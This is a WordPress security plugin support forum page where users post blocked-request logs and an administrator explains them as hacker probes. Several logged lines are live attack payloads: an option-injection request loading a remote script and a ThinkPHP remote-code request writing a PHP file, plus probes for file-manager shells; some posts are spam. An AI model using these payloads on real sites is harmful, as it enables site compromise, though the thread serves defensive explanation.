Security Log Event Codes

Home Forums BulletProof Security Pro Security Log Event Codes

Viewing 14 posts - 76 through 89 (of 89 total)
  • Author
    Posts
  • #35544
    Bub
    Participant

    Done and done…. Thanks. This topic should now be closed.

    #35545
    Bub
    Participant

    Again, thanks.

    #37723
    sergeykar
    Participant

    I have been seeing this frequently in my security log – and it appears like a hack attempt – not sure what it is because I have not seen this in the past. It appears BPS is doing it’s job – however is there a weakness this attempt is trying to exploit?

    [403 GET Request: 06.08.2019 - 10:15]
    BPS: 3.5
    WP: 5.2.2
    Event Code: WPADMIN-SBR
    Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
    REMOTE_ADDR: 159.69.154.78
    Host Name: static.78.154.69.159.clients.your-server.de
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /wp-admin/admin-ajax.php?nd_options_value_import_settings=siteurl[nd_options_option_value]https://jackielovedogs.com/pret.js?l=1&[nd_options_end_option]
    QUERY_STRING: nd_options_value_import_settings=siteurl[nd_options_option_value]https://jackielovedogs.com/pret.js?l=1&[nd_options_end_option]
    HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36
    #37724
    AITpro Admin
    Keymaster

    This is either a probe looking for existing injected hacker code in your website’s Source Code or a hacker trying to exploit an existing hack injection on your website’s Source Code.  To check if your website is hacked do the steps below:

    1. Go to your website’s home page.
    2. Right mouse click and click View page source (google chrome) or a similar command for other Browsers.
    3. Use your Browser’s Find… command (google chrome – located under settings > Find…) and enter this search string:  nd_options
    4. If you see/find Source Code that looks like this below then your website is hacked.
    5. Let me know if your Browser Find/Search finds any search results or not.

    httx://expat.ca/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=jfjvc.php&vars%5B1%5D%5B%5D=%3C?php%20mb_ereg_replace(, httx://expat.ca/jfjvc.php, httx://expat.ca/wp-admin/admin-ajax.php?nd_options_value_import_settings=siteurl[nd_options_option_value]httxs://jackielovedogs.com/pret.js?l=1&[nd_options_end_option], httx://expat.ca/wp-admin/admin-post.phpnd_options_value_import_settings=home[nd_options_option_value]httxs://jackielovedogs.com/pret?l=1&[nd_options_end_option],
    #39337
    Chris Moon
    Participant

    Found this in my Security Log and not sure what it mens:

    [403 GET Request: September 19, 2020 - 23:57]
    BPS Pro: 14.8
    WP: 5.5.1
    Event Code: PFWR-PSBR-HPRA
    Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
    REMOTE_ADDR: GDPR Compliance On
    Host Name: ns4.transcomag.net
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP: GDPR Compliance On
    HTTP_FORWARDED: GDPR Compliance On
    HTTP_X_FORWARDED_FOR: GDPR Compliance On
    HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/n.php
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla
    
    [403 GET Request: September 19, 2020 - 23:57]
    BPS Pro: 14.8
    WP: 5.5.1
    Event Code: PFWR-PSBR-HPRA
    Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
    REMOTE_ADDR: GDPR Compliance On
    Host Name: ns4.transcomag.net
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP: GDPR Compliance On
    HTTP_FORWARDED: GDPR Compliance On
    HTTP_X_FORWARDED_FOR: GDPR Compliance On
    HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/accesson.php
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla
    
    [403 GET Request: September 19, 2020 - 23:57]
    BPS Pro: 14.8
    WP: 5.5.1
    Event Code: PFWR-PSBR-HPRA
    Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
    REMOTE_ADDR: GDPR Compliance On
    Host Name: ns4.transcomag.net
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP: GDPR Compliance On
    HTTP_FORWARDED: GDPR Compliance On
    HTTP_X_FORWARDED_FOR: GDPR Compliance On
    HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/upload.php
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla
    
    [403 GET Request: September 19, 2020 - 23:57]
    BPS Pro: 14.8
    WP: 5.5.1
    Event Code: PFWR-PSBR-HPRA
    Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
    REMOTE_ADDR: GDPR Compliance On
    Host Name: ns4.transcomag.net
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP: GDPR Compliance On
    HTTP_FORWARDED: GDPR Compliance On
    HTTP_X_FORWARDED_FOR: GDPR Compliance On
    HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/thumbs.php
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla
    
    [403 GET Request: September 19, 2020 - 23:57]
    BPS Pro: 14.8
    WP: 5.5.1
    Event Code: PFWR-PSBR-HPRA
    Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
    REMOTE_ADDR: GDPR Compliance On
    Host Name: ns4.transcomag.net
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP: GDPR Compliance On
    HTTP_FORWARDED: GDPR Compliance On
    HTTP_X_FORWARDED_FOR: GDPR Compliance On
    HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/x.php
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla
    
    [403 GET Request: September 19, 2020 - 23:57]
    BPS Pro: 14.8
    WP: 5.5.1
    Event Code: PFWR-PSBR-HPRA
    Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
    REMOTE_ADDR: GDPR Compliance On
    Host Name: ns4.transcomag.net
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP: GDPR Compliance On
    HTTP_FORWARDED: GDPR Compliance On
    HTTP_X_FORWARDED_FOR: GDPR Compliance On
    HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /wp-content/plugins/quiz-master-next/js/admin.js
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla
    #39338
    AITpro Admin
    Keymaster

    @ Chris Moon – These are typical hacker recon/searches for known plugins with security vulnerabilities.  The BPS Pro Plugin Firewall protects all plugin files in the WordPress /plugins/ folder.  So these recons/searches were blocked by the BPS Pro Plugin Firewall.

    #39340
    Chris Moon
    Participant

    Thanks Ed, that’s reassuring.

    #42015
    bataraha
    Participant

    Thanks for confirming the solution.  Also we are trying several different methods to try and get the exact solution that is needed in Phase 2 Security Log Solution Targeting on the frontend of the site so that it is logged with the exact solution in the Security Log, but we keep running into a website performance problem.  A website performance decrease of even .1 (point 1) seconds is not acceptable so it is looking like the backend troubleshooting tool is going to be the only way to go.

    #42016
    AITpro Admin
    Keymaster

    @ bataraha – BPS does not cause any website performance slowness and can actually speed up website performance.

    #42090
    Max Parker
    Participant

    interesting information

    #42266
    Nora
    Participant

    Clicker Counter lets you calculate the figure of the mouse click, exercise repetitions, or other things. clickercounter.org 

    #42476
    Larisa
    Participant

    Event 4738 is generated every time a user object is changed. At times, this event may not show any changes—that is, all Changed Attributes appear as “-. “ This usually happens when a change is made to an attribute that is not listed in the event. In this case, there’s no way to determine   love language test    which attribute was changed 4672: Special privileges assigned to new logon. This event lets you know whenever an account assigned any “administrator equivalent” user rights logs on. For instance you will see event 4672 in close proximity to logon events (4624) for administrators since administrators have most of these admin-equivalent rights.

    #42670
    meets korun
    Participant

    thanks

    #43832
    Sanjeev
    Participant

    If the plugin isn’t installed, treat any requests related to it as potential hacker activity. No need to engage; simply ignore as it’s unrelated to your site’s setup.

Viewing 14 posts - 76 through 89 (of 89 total)
  • You must be logged in to reply to this topic.